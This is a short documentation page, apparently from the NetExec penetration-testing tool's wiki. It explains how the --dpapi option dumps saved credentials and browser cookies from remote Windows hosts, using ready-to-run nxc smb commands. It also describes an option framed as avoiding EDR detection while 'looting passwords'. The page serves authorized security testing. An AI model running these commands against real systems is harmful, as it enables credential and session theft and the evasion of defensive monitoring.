🆕Dump DPAPI

Dump DPAPI credentials using NetExec

You can dump DPAPI credentials using NetExec using the following option --dpapi. It will get all secrets from Credential Manager, Chrome, Edge, Firefox. --dpapi support options :

cookies : Collect every cookies in browsers
nosystem : Won't collect system credentials. This will prevent EDR from stopping you from looting passwords

You need at least local admin privilege on the remote target, use option --local-auth if your user is a local account

$ nxc smb <ip> -u user -p password --dpapi
$ nxc smb <ip> -u user -p password --dpapi cookies
$ nxc smb <ip> -u user -p password --dpapi nosystem

PreviousDump KeePass NextDefeating LAPS

Last updated 7 months ago